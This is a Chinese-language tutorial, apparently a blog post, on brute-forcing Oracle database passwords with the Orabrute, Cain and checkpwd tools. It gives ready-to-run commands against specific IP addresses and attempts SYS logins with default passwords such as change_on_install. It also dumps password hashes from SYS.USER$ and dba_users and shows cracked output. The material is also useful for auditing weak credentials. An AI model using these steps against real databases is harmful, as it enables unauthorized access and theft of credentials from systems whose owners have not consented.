暴力破解Oracle数据库密码的方法

暴力破解Oracle数据库密码的方法

一、前提条件

    要连接远程的 Oracle 数据库，需要知道 SID，用户名， 密码，当然还有最重要的 IP 地址。SID 如果被管理 员修改的话，可以利用 sidguess 来进行破解，速度非常的快，至于成功与否，就要看你的字典配置了。可以得知选择远程破解Oracle 的最好帐户是SYS，因为此帐户永远有效。在Oracle10g以前的版本在安装的时候并没有提示修改SYS 的默认密码，Oracle10g 虽然提示修改密码了，但是并没有检查密码的复杂性。

二、破解方法

1、使用Orabrute 工具来进行远程破解

可以使用Orabrute 工具来进行远程破解，在使用这个工具的时候，需要系统提前安装好Sqlplus，该工具的
原理很简单，就是不停的调用Sqlplus 然后进行登录验证，帐户选择的是SYS，密码则为password.txt 中的密码单词。只要登录成功，就会调用selectpassword.sql 脚本抓取出在SYS.USER$表中的其他用户的哈希值，然后退出程序。这里有个注意的地方，当第二次运行Orabrute 的时候，需要删除或移动同目录下的前一次运行Orabrute 时生成的thepasswordsarehere.txt 和output.txt 文件。
Orabrute 的使用方法为：

D:/soft/oracle/Orabrute>orabrute
Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
orabrute <hostip> <port> <sid> <millitimewait>
D:/soft/oracle/Orabrute>

Orabrute 的破解速度比较慢，建议在password.txt开头加上诸如change_on_install这样你认为可能的密码。

D:/soft/oracle/Orabrute>orabrute 172.19.111.37 1521 orcl 2000
Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
orabrute <hostip> <port> <sid> <millitimewait>sqlplus.exe -S -L "SYS/change_on_install@172.19.111.37:1521/orcl" as sysdba @selectpassword.sql

NAME                           PASSWORD
------------------------------ ------------------------------
SYS                            D4C5016086B2DC6A
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM                         D4DF7931AB130E37
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE

2、使用Cain工具破解Oracle密码

首先，通过SQLPlus获得用户名和密码的Hash，SQL> select username,password from dba_users;

USERNAME
------------------------------------------------------------
PASSWORD
------------------------------------------------------------
SYS
8A8F025737A9097A

SYSTEM
2D594E86F93B17A1

DBSNMP
FFF45BB2C0C327EC


USERNAME
------------------------------------------------------------
PASSWORD
------------------------------------------------------------
SYSMAN
2CA614501F09FCCC

MGMT_VIEW
7967E9F7D325932C

ABC2
2BC5EEFA22EE5E5E
其次，安装Cain，安装后的截图如下：

 

 

最后，利用Cain的crack功能对Oracle的密码进行字典猜解，步骤如下：

 

第一步：运行cain，点击Craker中的Oracle

暴力破解Oracle数据库密码的方法

 

第二步：输入用户名和密码Hash，如：SYS 8A8F025737A9097A

 

暴力破解Oracle数据库密码的方法

 

第二步：点击Start，等5分钟后会发现破解的结果

暴力破解Oracle数据库密码的方法
暴力破解Oracle数据库密码的方法

破解后的密码为oracle

3、  Oracle Checkpasswd_big 破解密码


C:/oracle_checkpwd_big>checkpwd system/wy@//192.168.1.116:1521/NBO password_file

下载地址http://www.red-database-security.com/software/checkpwd.html